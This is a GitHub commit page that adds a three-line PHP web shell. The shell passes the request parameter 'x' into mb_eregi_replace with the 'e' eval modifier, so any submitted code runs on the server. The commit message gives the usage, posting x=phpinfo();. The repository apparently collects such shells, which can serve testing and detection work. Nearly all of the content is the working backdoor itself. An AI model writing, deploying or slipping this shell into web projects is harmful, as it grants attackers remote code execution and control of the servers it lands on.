Create 2020.08.20.15.php

use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
This commit is contained in:
tennc 2020-08-20 12:48:04 +08:00 committed by GitHub
parent 6a9169da6b
commit ecc1fb09ee
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

3
php/2020.08.20.15.php Normal file
View file

@ -0,0 +1,3 @@
<?php
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
?>